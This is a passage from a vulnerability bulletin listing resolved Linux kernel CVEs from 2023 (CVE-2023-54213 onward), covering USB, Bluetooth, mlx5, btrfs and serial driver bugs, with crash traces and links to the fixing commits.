| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: sisusbvga: Add endpoint checks The syzbot fuzzer was able to provoke a WARNING from the sisusbvga driver: ------------[ cut here ]------------ usb 1-1: BOGUS urb xfer, pipe 3 != type 1 WARNING: CPU: 1 PID: 26 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Modules linked in: CPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.2.0-rc5-syzkaller-00199-g5af6ce704936 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/12/2023 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Code: 7c 24 18 e8 6c 50 80 fb 48 8b 7c 24 18 e8 62 1a 01 ff 41 89 d8 44 89 e1 4c 89 ea 48 89 c6 48 c7 c7 60 b1 fa 8a e8 84 b0 be 03 <0f> 0b e9 58 f8 ff ff e8 3e 50 80 fb 48 81 c5 c0 05 00 00 e9 84 f7 RSP: 0018:ffffc90000a1ed18 EFLAGS: 00010282 RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000 RDX: ffff888012783a80 RSI: ffffffff816680ec RDI: fffff52000143d95 RBP: ffff888079020000 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000080000000 R11: 0000000000000000 R12: 0000000000000003 R13: ffff888017d33370 R14: 0000000000000003 R15: ffff888021213600 FS: 0000000000000000(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005592753a60b0 CR3: 0000000022899000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> sisusb_bulkout_msg drivers/usb/misc/sisusbvga/sisusbvga.c:224 [inline] sisusb_send_bulk_msg.constprop.0+0x904/0x1230 drivers/usb/misc/sisusbvga/sisusbvga.c:379 sisusb_send_bridge_packet drivers/usb/misc/sisusbvga/sisusbvga.c:567 [inline] sisusb_do_init_gfxdevice drivers/usb/misc/sisusbvga/sisusbvga.c:2077 [inline] sisusb_init_gfxdevice+0x87b/0x4000 drivers/usb/misc/sisusbvga/sisusbvga.c:2177 sisusb_probe+0x9cd/0xbe2 drivers/usb/misc/sisusbvga/sisusbvga.c:2869 ... The problem was caused by the fact that the driver does not check whether the endpoints it uses are actually present and have the appropriate types. This can be fixed by adding a simple check of the endpoints. | 2025-12-30 | not yet calculated | CVE-2023-54213 | https://git.kernel.org/stable/c/bccb2ccb65515dc66a8001f99f4dcba8a45987f9 https://git.kernel.org/stable/c/a8f980ecb0112100366c64e0404d9dd1dcbd2fcd https://git.kernel.org/stable/c/a730feb672c7d7c5f7414c3715f8e3fa844e5a9b https://git.kernel.org/stable/c/ccef03c5113506d27dd6530d3a9ef5715c068e13 https://git.kernel.org/stable/c/43f569fd0699c4240a5c96e5ba1a0844a595afca https://git.kernel.org/stable/c/d5dba4b7bf904143702fb4be641802ee2e9c95aa https://git.kernel.org/stable/c/0f9028b6ffaa98bff7c479cccf2558247e295534 https://git.kernel.org/stable/c/df05a9b05e466a46725564528b277d0c570d0104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix potential user-after-free This fixes all instances of which requires to allocate a buffer calling alloc_skb which may release the chan lock and reacquire later which makes it possible that the chan is disconnected in the meantime. | 2025-12-30 | not yet calculated | CVE-2023-54214 | https://git.kernel.org/stable/c/b2fde8cb2a25125111f2144604e0e7c0ebcc4bba https://git.kernel.org/stable/c/a6a7d1541fefddf7ca0cfb34c1bff63ff809cc49 https://git.kernel.org/stable/c/60aaccf16d1e099c16bebfb96428ae762cb528f7 https://git.kernel.org/stable/c/b8ed41cc04fb74005aa51d17865ca3d022760335 https://git.kernel.org/stable/c/31a288a4df7f6a28e65da22a4ab2add4a963738e https://git.kernel.org/stable/c/64e28ecf44e46de9f01915a4146706a21c3469d2 https://git.kernel.org/stable/c/994e3e18908f5c4a12d07b44018e6aa85f071048 https://git.kernel.org/stable/c/df5703348813235874d851934e957c3723d71644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-vdpa: Fix cpumask memory leak in virtio_vdpa_find_vqs() Free the cpumask allocated by create_affinity_masks() before returning from the function. | 2025-12-30 | not yet calculated | CVE-2023-54215 | https://git.kernel.org/stable/c/fa450621efab58121fe8e57f7a7b80fee6e0bae1 https://git.kernel.org/stable/c/df9557046440b0a62250fee3169a8f6a139f55a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: TC, Fix using eswitch mapping in nic mode Cited patch is using the eswitch object mapping pool while in nic mode where it isn't initialized. This results in the trace below [0]. Fix that by using either nic or eswitch object mapping pool depending if eswitch is enabled or not. [0]: [ 826.446057] ================================================================== [ 826.446729] BUG: KASAN: slab-use-after-free in mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.447515] Read of size 8 at addr ffff888194485830 by task tc/6233 [ 826.448243] CPU: 16 PID: 6233 Comm: tc Tainted: G W 6.3.0-rc6+ #1 [ 826.448890] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 826.449785] Call Trace: [ 826.450052] <TASK> [ 826.450302] dump_stack_lvl+0x33/0x50 [ 826.450650] print_report+0xc2/0x610 [ 826.450998] ? __virt_addr_valid+0xb1/0x130 [ 826.451385] ? mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.451935] kasan_report+0xae/0xe0 [ 826.452276] ? mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.452829] mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.453368] ? __kmalloc_node+0x5a/0x120 [ 826.453733] esw_add_restore_rule+0x20f/0x270 [mlx5_core] [ 826.454288] ? mlx5_eswitch_add_send_to_vport_meta_rule+0x260/0x260 [mlx5_core] [ 826.455011] ? mutex_unlock+0x80/0xd0 [ 826.455361] ? __mutex_unlock_slowpath.constprop.0+0x210/0x210 [ 826.455862] ? mapping_add+0x2cb/0x440 [mlx5_core] [ 826.456425] mlx5e_tc_action_miss_mapping_get+0x139/0x180 [mlx5_core] [ 826.457058] ? mlx5e_tc_update_skb_nic+0xb0/0xb0 [mlx5_core] [ 826.457636] ? __kasan_kmalloc+0x77/0x90 [ 826.458000] ? __kmalloc+0x57/0x120 [ 826.458336] mlx5_tc_ct_flow_offload+0x325/0xe40 [mlx5_core] [ 826.458916] ? ct_kernel_enter.constprop.0+0x48/0xa0 [ 826.459360] ? mlx5_tc_ct_parse_action+0xf0/0xf0 [mlx5_core] [ 826.459933] ? mlx5e_mod_hdr_attach+0x491/0x520 [mlx5_core] [ 826.460507] ? mlx5e_mod_hdr_get+0x12/0x20 [mlx5_core] [ 826.461046] ? mlx5e_tc_attach_mod_hdr+0x154/0x170 [mlx5_core] [ 826.461635] mlx5e_configure_flower+0x969/0x2110 [mlx5_core] [ 826.462217] ? _raw_spin_lock_bh+0x85/0xe0 [ 826.462597] ? __mlx5e_add_fdb_flow+0x750/0x750 [mlx5_core] [ 826.463163] ? kasan_save_stack+0x2e/0x40 [ 826.463534] ? down_read+0x115/0x1b0 [ 826.463878] ? down_write_killable+0x110/0x110 [ 826.464288] ? tc_setup_action.part.0+0x9f/0x3b0 [ 826.464701] ? mlx5e_is_uplink_rep+0x4c/0x90 [mlx5_core] [ 826.465253] ? mlx5e_tc_reoffload_flows_work+0x130/0x130 [mlx5_core] [ 826.465878] tc_setup_cb_add+0x112/0x250 [ 826.466247] fl_hw_replace_filter+0x230/0x310 [cls_flower] [ 826.466724] ? fl_hw_destroy_filter+0x1a0/0x1a0 [cls_flower] [ 826.467212] fl_change+0x14e1/0x2030 [cls_flower] [ 826.467636] ? sock_def_readable+0x89/0x120 [ 826.468019] ? fl_tmplt_create+0x2d0/0x2d0 [cls_flower] [ 826.468509] ? kasan_unpoison+0x23/0x50 [ 826.468873] ? get_random_u16+0x180/0x180 [ 826.469244] ? __radix_tree_lookup+0x2b/0x130 [ 826.469640] ? fl_get+0x7b/0x140 [cls_flower] [ 826.470042] ? fl_mask_put+0x200/0x200 [cls_flower] [ 826.470478] ? __mutex_unlock_slowpath.constprop.0+0x210/0x210 [ 826.470973] ? fl_tmplt_create+0x2d0/0x2d0 [cls_flower] [ 826.471427] tc_new_tfilter+0x644/0x1050 [ 826.471795] ? tc_get_tfilter+0x860/0x860 [ 826.472170] ? __thaw_task+0x130/0x130 [ 826.472525] ? arch_stack_walk+0x98/0xf0 [ 826.472892] ? cap_capable+0x9f/0xd0 [ 826.473235] ? security_capable+0x47/0x60 [ 826.473608] rtnetlink_rcv_msg+0x1d5/0x550 [ 826.473985] ? rtnl_calcit.isra.0+0x1f0/0x1f0 [ 826.474383] ? __stack_depot_save+0x35/0x4c0 [ 826.474779] ? kasan_save_stack+0x2e/0x40 [ 826.475149] ? kasan_save_stack+0x1e/0x40 [ 826.475518] ? __kasan_record_aux_stack+0x9f/0xb0 [ 826.475939] ? task_work_add+0x77/0x1c0 [ 826.476305] netlink_rcv_skb+0xe0/0x210 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54216 | https://git.kernel.org/stable/c/4150441c010dec36abc389828e2e4758bd8ad4b3 https://git.kernel.org/stable/c/dfa1e46d6093831b9d49f0f350227a1d13644a2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "drm/msm: Add missing check and destroy for alloc_ordered_workqueue" This reverts commit 643b7d0869cc7f1f7a5ac7ca6bd25d88f54e31d0. A recent patch that tried to fix up the msm_drm_init() paths with respect to the workqueue but only ended up making things worse: First, the newly added calls to msm_drm_uninit() on early errors would trigger NULL-pointer dereferences, for example, as the kms pointer would not have been initialised. (Note that these paths were also modified by a second broken error handling patch which in effect cancelled out this part when merged.) Second, the newly added allocation sanity check would still leak the previously allocated drm device. Instead of trying to salvage what was badly broken (and clearly not tested), let's revert the bad commit so that clean and backportable fixes can be added in its place. Patchwork: https://patchwork.freedesktop.org/patch/525107/ | 2025-12-30 | not yet calculated | CVE-2023-54217 | https://git.kernel.org/stable/c/9078b434587722a6f2958dc1d536af6e39634db9 https://git.kernel.org/stable/c/dfa70344d1b5f5ff08525a8c872c8dd5e82fc5d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Fix load-tearing on sk->sk_stamp in sock_recv_cmsgs(). KCSAN found a data race in sock_recv_cmsgs() where the read access to sk->sk_stamp needs READ_ONCE(). BUG: KCSAN: data-race in packet_recvmsg / packet_recvmsg write (marked) to 0xffff88803c81f258 of 8 bytes by task 19171 on cpu 0: sock_write_timestamp include/net/sock.h:2670 [inline] sock_recv_cmsgs include/net/sock.h:2722 [inline] packet_recvmsg+0xb97/0xd00 net/packet/af_packet.c:3489 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg+0x11a/0x130 net/socket.c:1040 sock_read_iter+0x176/0x220 net/socket.c:1118 call_read_iter include/linux/fs.h:1845 [inline] new_sync_read fs/read_write.c:389 [inline] vfs_read+0x5e0/0x630 fs/read_write.c:470 ksys_read+0x163/0x1a0 fs/read_write.c:613 __do_sys_read fs/read_write.c:623 [inline] __se_sys_read fs/read_write.c:621 [inline] __x64_sys_read+0x41/0x50 fs/read_write.c:621 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffff88803c81f258 of 8 bytes by task 19183 on cpu 1: sock_recv_cmsgs include/net/sock.h:2721 [inline] packet_recvmsg+0xb64/0xd00 net/packet/af_packet.c:3489 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg+0x11a/0x130 net/socket.c:1040 sock_read_iter+0x176/0x220 net/socket.c:1118 call_read_iter include/linux/fs.h:1845 [inline] new_sync_read fs/read_write.c:389 [inline] vfs_read+0x5e0/0x630 fs/read_write.c:470 ksys_read+0x163/0x1a0 fs/read_write.c:613 __do_sys_read fs/read_write.c:623 [inline] __se_sys_read fs/read_write.c:621 [inline] __x64_sys_read+0x41/0x50 fs/read_write.c:621 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0xffffffffc4653600 -> 0x0000000000000000 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 19183 Comm: syz-executor.5 Not tainted 6.3.0-rc7-02330-gca6270c12e20 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-30 | not yet calculated | CVE-2023-54218 | https://git.kernel.org/stable/c/fd28692fa182d25e8d26bc1db506648839fde245 https://git.kernel.org/stable/c/564c3150ad357d571a0de7d8b644aa1f7e6e21b7 https://git.kernel.org/stable/c/d7343f8de019ebb55b2b6ef79b971f6ceb361a99 https://git.kernel.org/stable/c/d06f67b2b8dcd00d995c468428b6bccebc5762d8 https://git.kernel.org/stable/c/de260d1e02cde39d317066835ee6e5234fc9f5a8 https://git.kernel.org/stable/c/7145f2309d649ad6273b9f66448321b9b4c523c8 https://git.kernel.org/stable/c/8319220054e5ea5f506d8d4c4b5e234f668ffc3b https://git.kernel.org/stable/c/dfd9248c071a3710c24365897459538551cb7167 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "IB/isert: Fix incorrect release of isert connection" Commit: 699826f4e30a ("IB/isert: Fix incorrect release of isert connection") is causing problems on OPA when DEVICE_REMOVAL is happening. ------------[ cut here ]------------ WARNING: CPU: 52 PID: 2117247 at drivers/infiniband/core/cq.c:359 ib_cq_pool_cleanup+0xac/0xb0 [ib_core] Modules linked in: nfsd nfs_acl target_core_user uio tcm_fc libfc scsi_transport_fc tcm_loop target_core_pscsi target_core_iblock target_core_file rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs rfkill rpcrdma rdma_ucm ib_srpt sunrpc ib_isert iscsi_target_mod target_core_mod opa_vnic ib_iser libiscsi ib_umad scsi_transport_iscsi rdma_cm ib_ipoib iw_cm ib_cm hfi1(-) rdmavt ib_uverbs intel_rapl_msr intel_rapl_common sb_edac ib_core x86_pkg_temp_thermal intel_powerclamp coretemp i2c_i801 mxm_wmi rapl iTCO_wdt ipmi_si iTCO_vendor_support mei_me ipmi_devintf mei intel_cstate ioatdma intel_uncore i2c_smbus joydev pcspkr lpc_ich ipmi_msghandler acpi_power_meter acpi_pad xfs libcrc32c sr_mod sd_mod cdrom t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel drm_kms_helper drm_shmem_helper ahci libahci ghash_clmulni_intel igb drm libata dca i2c_algo_bit wmi fuse CPU: 52 PID: 2117247 Comm: modprobe Not tainted 6.5.0-rc1+ #1 Hardware name: Intel Corporation S2600CWR/S2600CW, BIOS SE5C610.86B.01.01.0014.121820151719 12/18/2015 RIP: 0010:ib_cq_pool_cleanup+0xac/0xb0 [ib_core] Code: ff 48 8b 43 40 48 8d 7b 40 48 83 e8 40 4c 39 e7 75 b3 49 83 c4 10 4d 39 fc 75 94 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc <0f> 0b eb a1 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f RSP: 0018:ffffc10bea13fc80 EFLAGS: 00010206 RAX: 000000000000010c RBX: ffff9bf5c7e66c00 RCX: 000000008020001d RDX: 000000008020001e RSI: fffff175221f9900 RDI: ffff9bf5c7e67640 RBP: ffff9bf5c7e67600 R08: ffff9bf5c7e64400 R09: 000000008020001d R10: 0000000040000000 R11: 0000000000000000 R12: ffff9bee4b1e8a18 R13: dead000000000122 R14: dead000000000100 R15: ffff9bee4b1e8a38 FS: 00007ff1e6d38740(0000) GS:ffff9bfd9fb00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005652044ecc68 CR3: 0000000889b5c005 CR4: 00000000001706e0 Call Trace: <TASK> ? __warn+0x80/0x130 ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core] ? report_bug+0x195/0x1a0 ? handle_bug+0x3c/0x70 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core] disable_device+0x9d/0x160 [ib_core] __ib_unregister_device+0x42/0xb0 [ib_core] ib_unregister_device+0x22/0x30 [ib_core] rvt_unregister_device+0x20/0x90 [rdmavt] hfi1_unregister_ib_device+0x16/0xf0 [hfi1] remove_one+0x55/0x1a0 [hfi1] pci_device_remove+0x36/0xa0 device_release_driver_internal+0x193/0x200 driver_detach+0x44/0x90 bus_remove_driver+0x69/0xf0 pci_unregister_driver+0x2a/0xb0 hfi1_mod_cleanup+0xc/0x3c [hfi1] __do_sys_delete_module.constprop.0+0x17a/0x2f0 ? exit_to_user_mode_prepare+0xc4/0xd0 ? syscall_trace_enter.constprop.0+0x126/0x1a0 do_syscall_64+0x5c/0x90 ? syscall_exit_to_user_mode+0x12/0x30 ? do_syscall_64+0x69/0x90 ? syscall_exit_work+0x103/0x130 ? syscall_exit_to_user_mode+0x12/0x30 ? do_syscall_64+0x69/0x90 ? exc_page_fault+0x65/0x150 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 RIP: 0033:0x7ff1e643f5ab Code: 73 01 c3 48 8b 0d 75 a8 1b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 b0 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 45 a8 1b 00 f7 d8 64 89 01 48 RSP: 002b:00007ffec9103cc8 EFLAGS: 00000206 ORIG_RAX: 00000000000000b0 RAX: ffffffffffffffda RBX: 00005615267fdc50 RCX: 00007ff1e643f5ab RDX: 0000000000000000 RSI: 0000000000000800 RDI: 00005615267fdcb8 RBP: 00005615267fdc50 R08: 0000000000000000 R09: 0000000000000000 R10: 00007ff1e659eac0 R11: 0000000000000206 R12: 00005615267fdcb8 R13: 00000000000 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54219 | https://git.kernel.org/stable/c/77e90bd53019d4d4c9e25552b5efb06dfd8c3c82 https://git.kernel.org/stable/c/a277b736309f923d9baff0ef166d694d348a5b96 https://git.kernel.org/stable/c/9b6296861a5a9d58aacd72c249a68b073c78bfb4 https://git.kernel.org/stable/c/aa950b9835f2d004b071fd220459edd3cd0a3603 https://git.kernel.org/stable/c/1bb42aca7a9611c1991a790834e2a65f3345c5e8 https://git.kernel.org/stable/c/3f39698e7e842abc9bd2bd97bf5eeda4543db758 https://git.kernel.org/stable/c/4082b59705ee9e3912eaa9e15abda8e76039b681 https://git.kernel.org/stable/c/a3189341e2f609d48f730b18c8bbbf6783233477 https://git.kernel.org/stable/c/dfe261107c080709459c32695847eec96238852b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250: Fix oops for port->pm on uart_change_pm() Unloading a hardware specific 8250 driver can produce error "Unable to handle kernel paging request at virtual address" about ten seconds after unloading the driver. This happens on uart_hangup() calling uart_change_pm(). Turns out commit 04e82793f068 ("serial: 8250: Reinit port->pm on port specific driver unbind") was only a partial fix. If the hardware specific driver has initialized port->pm function, we need to clear port->pm too. Just reinitializing port->ops does not do this. Otherwise serial8250_pm() will call port->pm() instead of serial8250_do_pm(). | 2025-12-30 | not yet calculated | CVE-2023-54220 | https://git.kernel.org/stable/c/66f3e55960698c874b0598277913b478ecd29573 https://git.kernel.org/stable/c/720a297b334e85d34099e83d1f375b92c3efedd6 https://git.kernel.org/stable/c/b653289ca6460a6552c8590b75dfa84a0140a46b https://git.kernel.org/stable/c/bd70d0b28010d560a8be96b44fea86fe2ba016ae https://git.kernel.org/stable/c/18e27df4f2b4e257c317ba8076f31a888f6cc64b https://git.kernel.org/stable/c/0c05493341d6f2097f75f0a5dbb7b53a9e8c5f6c https://git.kernel.org/stable/c/375806616f8c772c33d40e112530887b37c1a816 https://git.kernel.org/stable/c/dfe2aeb226fd5e19b0ee795f4f6ed8bc494c1534 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: imx93: fix memory leak and missing unwind goto in imx93_clocks_probe In function probe(), it returns directly without unregistered hws when error occurs. Fix this by adding 'goto unregister_hws;' on line 295 and line 310. Use devm_kzalloc() instead of kzalloc() to automatically free the memory using devm_kfree() when error occurs. Replace of_iomap() with devm_of_iomap() to automatically handle the unused ioremap region and delete 'iounmap(anatop_base);' in unregister_hws. | 2025-12-30 | not yet calculated | CVE-2023-54221 | https://git.kernel.org/stable/c/280a5ff665e12d1e0c54c20cedc9c5008aa686a5 https://git.kernel.org/stable/c/fac9c624138c4bc021d7a8ee3b974c9e10926d92 https://git.kernel.org/stable/c/d17c16a2b2a6589c45b0bfb1b9914da80b72d89e https://git.kernel.org/stable/c/e02ba11b457647050cb16e7cad16cec3c252fade |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hte: tegra-194: Fix off by one in tegra_hte_map_to_line_id() The "map_sz" is the number of elements in the "m" array so the > comparison needs to be changed to >= to prevent an out of bounds read. | 2025-12-30 | not yet calculated | CVE-2023-54222 | https://git.kernel.org/stable/c/fed87ce073c7b9f4f255105f90bd930df06d18a7 https://git.kernel.org/stable/c/aedc364a7c9cd2fb45b4f7c0a41c98365369ff46 https://git.kernel.org/stable/c/2a488602e3f09ef9e50feb5448ae46515a6fa789 https://git.kernel.org/stable/c/e078180d66848a6a890daf0a3ce28dc43cc66790 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: xsk: Fix invalid buffer access for legacy rq The below crash can be encountered when using xdpsock in rx mode for legacy rq: the buffer gets released in the XDP_REDIRECT path, and then once again in the driver. This fix sets the flag to avoid releasing on the driver side. XSK handling of buffers for legacy rq was relying on the caller to set the skip release flag. But the referenced fix started using fragment counts for pages instead of the skip flag. Crash log: general protection fault, probably for non-canonical address 0xffff8881217e3a: 0000 [#1] SMP CPU: 0 PID: 14 Comm: ksoftirqd/0 Not tainted 6.5.0-rc1+ #31 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:bpf_prog_03b13f331978c78c+0xf/0x28 Code: ... RSP: 0018:ffff88810082fc98 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888138404901 RCX: c0ffffc900027cbc RDX: ffffffffa000b514 RSI: 00ffff8881217e32 RDI: ffff888138404901 RBP: ffff88810082fc98 R08: 0000000000091100 R09: 0000000000000006 R10: 0000000000000800 R11: 0000000000000800 R12: ffffc9000027a000 R13: ffff8881217e2dc0 R14: ffff8881217e2910 R15: ffff8881217e2f00 FS: 0000000000000000(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000564cb2e2cde0 CR3: 000000010e603004 CR4: 0000000000370eb0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? die_addr+0x32/0x80 ? exc_general_protection+0x192/0x390 ? asm_exc_general_protection+0x22/0x30 ? 0xffffffffa000b514 ? bpf_prog_03b13f331978c78c+0xf/0x28 mlx5e_xdp_handle+0x48/0x670 [mlx5_core] ? dev_gro_receive+0x3b5/0x6e0 mlx5e_xsk_skb_from_cqe_linear+0x6e/0x90 [mlx5_core] mlx5e_handle_rx_cqe+0x55/0x100 [mlx5_core] mlx5e_poll_rx_cq+0x87/0x6e0 [mlx5_core] mlx5e_napi_poll+0x45e/0x6b0 [mlx5_core] __napi_poll+0x25/0x1a0 net_rx_action+0x28a/0x300 __do_softirq+0xcd/0x279 ? sort_range+0x20/0x20 run_ksoftirqd+0x1a/0x20 smpboot_thread_fn+0xa2/0x130 kthread+0xc9/0xf0 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 </TASK> Modules linked in: mlx5_ib mlx5_core rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter overlay zram zsmalloc fuse [last unloaded: mlx5_core] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2023-54223 | https://git.kernel.org/stable/c/58a113a35846d9a5bd759beb332e551e28451f09 https://git.kernel.org/stable/c/e0f52298fee449fec37e3e3c32df60008b509b16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix lockdep splat and potential deadlock after failure running delayed items When running delayed items we are holding a delayed node's mutex and then we will attempt to modify a subvolume btree to insert/update/delete the delayed items. However if have an error during the insertions for example, btrfs_insert_delayed_items() may return with a path that has locked extent buffers (a leaf at the very least), and then we attempt to release the delayed node at __btrfs_run_delayed_items(), which requires taking the delayed node's mutex, causing an ABBA type of deadlock. This was reported by syzbot and the lockdep splat is the following: WARNING: possible circular locking dependency detected 6.5.0-rc7-syzkaller-00024-g93f5de5f648d #0 Not tainted ------------------------------------------------------ syz-executor.2/13257 is trying to acquire lock: ffff88801835c0c0 (&delayed_node->mutex){+.+.}-{3:3}, at: __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256 but task is already holding lock: ffff88802a5ab8e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_lock+0x3c/0x2a0 fs/btrfs/locking.c:198 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (btrfs-tree-00){++++}-{3:3}: __lock_release kernel/locking/lockdep.c:5475 [inline] lock_release+0x36f/0x9d0 kernel/locking/lockdep.c:5781 up_write+0x79/0x580 kernel/locking/rwsem.c:1625 btrfs_tree_unlock_rw fs/btrfs/locking.h:189 [inline] btrfs_unlock_up_safe+0x179/0x3b0 fs/btrfs/locking.c:239 search_leaf fs/btrfs/ctree.c:1986 [inline] btrfs_search_slot+0x2511/0x2f80 fs/btrfs/ctree.c:2230 btrfs_insert_empty_items+0x9c/0x180 fs/btrfs/ctree.c:4376 btrfs_insert_delayed_item fs/btrfs/delayed-inode.c:746 [inline] btrfs_insert_delayed_items fs/btrfs/delayed-inode.c:824 [inline] __btrfs_commit_inode_delayed_items+0xd24/0x2410 fs/btrfs/delayed-inode.c:1111 __btrfs_run_delayed_items+0x1db/0x430 fs/btrfs/delayed-inode.c:1153 flush_space+0x269/0xe70 fs/btrfs/space-info.c:723 btrfs_async_reclaim_metadata_space+0x106/0x350 fs/btrfs/space-info.c:1078 process_one_work+0x92c/0x12c0 kernel/workqueue.c:2600 worker_thread+0xa63/0x1210 kernel/workqueue.c:2751 kthread+0x2b8/0x350 kernel/kthread.c:389 ret_from_fork+0x2e/0x60 arch/x86/kernel/process.c:145 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304 -> #0 (&delayed_node->mutex){+.+.}-{3:3}: check_prev_add kernel/locking/lockdep.c:3142 [inline] check_prevs_add kernel/locking/lockdep.c:3261 [inline] validate_chain kernel/locking/lockdep.c:3876 [inline] __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144 lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761 __mutex_lock_common+0x1d8/0x2530 kernel/locking/mutex.c:603 __mutex_lock kernel/locking/mutex.c:747 [inline] mutex_lock_nested+0x1b/0x20 kernel/locking/mutex.c:799 __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256 btrfs_release_delayed_node fs/btrfs/delayed-inode.c:281 [inline] __btrfs_run_delayed_items+0x2b5/0x430 fs/btrfs/delayed-inode.c:1156 btrfs_commit_transaction+0x859/0x2ff0 fs/btrfs/transaction.c:2276 btrfs_sync_file+0xf56/0x1330 fs/btrfs/file.c:1988 vfs_fsync_range fs/sync.c:188 [inline] vfs_fsync fs/sync.c:202 [inline] do_fsync fs/sync.c:212 [inline] __do_sys_fsync fs/sync.c:220 [inline] __se_sys_fsync fs/sync.c:218 [inline] __x64_sys_fsync+0x196/0x1e0 fs/sync.c:218 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd other info that ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54224 | https://git.kernel.org/stable/c/779c3cf2749c7a7bad6f839cb2954a25ba92f4d6 https://git.kernel.org/stable/c/32247b9526bfdaeef85f7339d9b4f913c7370f92 https://git.kernel.org/stable/c/36d918da3f1bf749178c7daf471a3be1730ed3ca https://git.kernel.org/stable/c/e110f8911ddb93e6f55da14ccbbe705397b30d0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: only reset hashed tables when supported Last year, the code that manages GSI channel transactions switched from using spinlock-protected linked lists to using indexes into the ring buffer used for a channel. Recently, Google reported seeing transaction reference count underflows occasionally during shutdown. Doug Anderson found a way to reproduce the issue reliably, and bisected the issue to the commit that eliminated the linked lists and the lock. The root cause was ultimately determined to be related to unused transactions being committed as part of the modem shutdown cleanup activity. Unused transactions are not normally expected (except in error cases). The modem uses some ranges of IPA-resident memory, and whenever it shuts down we zero those ranges. In 